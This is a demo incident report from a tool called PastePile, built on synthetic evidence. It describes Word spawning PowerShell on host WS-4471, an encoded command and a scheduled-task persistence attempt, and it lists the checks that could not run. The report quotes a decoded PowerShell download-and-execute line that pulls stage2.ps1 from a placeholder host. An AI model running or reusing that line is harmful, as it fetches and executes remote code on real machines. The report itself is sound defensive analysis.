PastePile
Incident investigation report
Reference C-0001 · Issued 2026-09-11 03:54:04 UTC
Demo case. The evidence in this case is synthetic and was generated by PastePile for demonstration. It is not real threat intelligence and does not describe any real organization.
What was examined
1 item(s) of evidence containing 22 record(s), covering 2026-08-24 09:05:11 UTC to 2026-08-24 10:51:02 UTC. Anything outside the evidence supplied is out of scope: nothing was collected, fetched or queried from your environment.
What was found
winword.exe started powershell.exe high
On WS-4471, winword.exe started powershell.exe. Office applications do not normally launch command interpreters. This is the behavior produced when a document runs a macro or an embedded object.
Recommended: Confirm with the user whether they opened a document at this time, and retrieve the document if so. If the activity was not expected, isolate the host before further triage.
PowerShell started with an encoded command high
On WS-4471, PowerShell was started with a base64-encoded command. The encoded payload decodes to: IEX (New-Object Net.WebClient).DownloadString('http://cdn-updates.example/stage2.ps1') It contains Invoke-Expression, Net.WebClient DownloadString.
Recommended: Decode and review the full command, then determine whether it corresponds to approved automation on this host.
Persistence requested from the command line (scheduled task) high
On WS-4471, A command requested scheduled task creation. It was run by powershell.exe. A persistence command launched by an interpreter or an Office application warrants investigation; the parent process does not establish malicious intent or whether the requested change succeeded.
Recommended: Check whether the requested task, service, autorun entry or WMI subscription exists and compare it with your change records. Remove any unauthorized artifact after confirming its presence.
Machines and accounts involved
WS-4471, r.okafor
What could not be determined
- Which document, add-in or macro caused the launch is not shown by the process record; that needs the file or the user's account of it.
- Whether the decoded command executed successfully, or what it did next, is not shown by process-creation evidence alone.
- Whether the requested persistence change succeeded, or any resulting task, service, autorun entry or WMI subscription ran, is not shown by process-creation evidence alone.
- This check needs Authentication / sign-in logs, which was not present in the evidence.
- This check needs Email message content or headers, which was not present in the evidence.
- This check needs Directory or account audit logs, which was not present in the evidence.
- This check needs Windows service creation events, which was not present in the evidence.
- This check needs Registry modification telemetry, which was not present in the evidence.
- This check needs Email authentication results (SPF/DKIM/DMARC) or Email message content or headers, which was not present in the evidence.
- This check needs Scheduled task creation events, which was not present in the evidence.
- This check needs Security product audit events, which was not present in the evidence.
- 2 external indicator(s) appear in the evidence. No third-party reputation lookup has been performed; PastePile only does that on your instruction.
What we recommend
- Confirm with the user whether they opened a document at this time, and retrieve the document if so Only if this activity was not expected or authorized.
- Decode and review the full command, then determine whether it corresponds to approved automation on this host Only if this activity was not expected or authorized.
- Check whether the requested task, service, autorun entry or WMI subscription exists and compare it with your change records Only if this activity was not expected or authorized.
What was checked
13 check(s) ran against the evidence you supplied. 21 could not run, because the evidence they need was not part of what was submitted.
A check that could not run is not a check that found nothing. These were not assessed:
- This check needs Authentication / sign-in logs, which was not present in the evidence. 5 check(s)
- This check needs Email message content or headers, which was not present in the evidence. 5 check(s)
- This check needs Directory or account audit logs, which was not present in the evidence. 4 check(s)
- This check needs Registry modification telemetry, which was not present in the evidence. 2 check(s)
- This check needs Windows service creation events, which was not present in the evidence. 2 check(s)
- This check needs Email authentication results (SPF/DKIM/DMARC) or Email message content or headers, which was not present in the evidence. 1 check(s)
- This check needs Scheduled task creation events, which was not present in the evidence. 1 check(s)
- This check needs Security product audit events, which was not present in the evidence. 1 check(s)
Supplying the evidence named above would let those checks run. Until then this report describes only what the submitted evidence shows.
How this was produced
The recorded outcomes above describe which evidence was processed and which checks ran. Receiving evidence alone does not mean analysis completed. No suspicious URL was visited, no attachment executed and no sample detonated. PastePile states what the supplied evidence supports and names what it does not establish; the decision about what to do remains yours.
Artificial intelligence. No language model was used in producing this case.
Findings are derived from the evidence supplied to this case and no other source.
Produced with PastePile.